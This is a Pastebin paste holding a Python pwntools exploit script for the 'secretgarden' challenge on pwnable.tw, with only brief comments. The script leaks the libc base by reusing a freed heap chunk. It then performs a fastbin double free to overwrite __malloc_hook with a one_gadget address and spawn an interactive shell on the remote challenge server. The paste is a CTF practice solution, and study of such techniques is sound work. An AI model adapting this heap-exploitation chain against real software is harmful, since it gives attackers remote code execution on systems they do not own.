API tools faq
paste
Advertisement
finalshare

DemoPwnable

finalshare
Sep 25th, 2018
132
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.93 KB | None | 0 0
raw download clone embed print report
  1. import sys
  2. import time
  3. from pwn import *
  4. env = {
  5.     "LD_PRELOAD": "./libc_64.so.6" 
  6. }
  7. glibc=ELF("./libc_64.so.6")
  8. context(os='linux', arch='i386', log_level='debug')
  9. GDB = 0
  10. listBp=[
  11. #0xE74,
  12. #0xF7A,
  13. 0xCD8,
  14. ]
  15. def createGDBScript(listBp,pie=False):
  16.     script =""
  17.     for a in listBp:
  18.         if (pie):
  19.             script+="b * "+str(hex(a+0x555555554000))+"\n"
  20.         else :
  21.             script+="b * "+str(hex(a))+"\n"
  22.     script+="c\n"
  23.     return script
  24. if len(sys.argv) >1:
  25.     flag=1
  26.     r = remote("chall.pwnable.tw", 10203)
  27. else:
  28.     flag=0
  29.     r = process("./secretgarden",aslr=False,env=env)
  30.  
  31.     if (GDB):
  32.     gdb.attach(r,gdbscript=createGDBScript(listBp,pie=True))
  33.  
  34. def add(length,name,color):
  35.     r.sendline("1")
  36.     r.sendlineafter("Length of the name :",str(length))
  37.  
  38.     r.sendafter("The name of flower :",name)
  39.     r.sendlineafter("The color of the flower :",color)
  40. def remove(index):
  41.     r.sendline("3")
  42.     r.sendlineafter("Which flower do you want to remove from the garden:",str(index))
  43. def main():
  44.     #First Fit Behavior
  45.     add(0x100,"AAAAAAAA","aaaaaaaa")
  46.     add(0x100,"BBBBBBBB","bbbbbbbb")
  47.     remove(0)
  48.     #Free First
  49.     #Malloc now get the pointer of first
  50.     add(0xc8,"x","cccccccc")
  51.     r.sendline("2")
  52.    
  53.     #0x155555328b20<----Leak
  54.     #0x155554f65000<----Base
  55.     r.recvuntil("Name of the flower[2] :")
  56.     libc=u64(r.recvuntil("\n")[:-1].ljust(8,'\x00'))-0x3c3c78
  57.     glibc.address=libc
  58.     log.success("libc: "+hex(libc))
  59.     log.success("malloc_hook: "+hex(glibc.symbols['__malloc_hook']))
  60.     remove(1)
  61.     remove(2)
  62.     one_gadget = glibc.address+0xef6c4
  63.     r.sendline("4")
  64.     r.recv()
  65.     r.sendline("2")
  66.     r.recv()
  67.     #raw_input()
  68.     #fastbin double free
  69.    
  70.     add(0x60,"1"*0x60,"0")
  71.     add(0x60,"2"*0x60,"1")
  72.     remove(0)
  73.     remove(1)
  74.     remove(0)
  75.     add(0x60,p64(glibc.symbols['__malloc_hook']-0x23),"2")
  76.     add(0x60,"3"*0x60,"3") 
  77.     add(0x60,"4"*0x60,"4") 
  78.     #gdb.attach(r)
  79.     add(0x60,"A"*0x13+p64(one_gadget),'5')
  80.    
  81.     remove(0)
  82.     remove(0)
  83.     r.interactive()
  84. if __name__ == "__main__":
  85.     main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!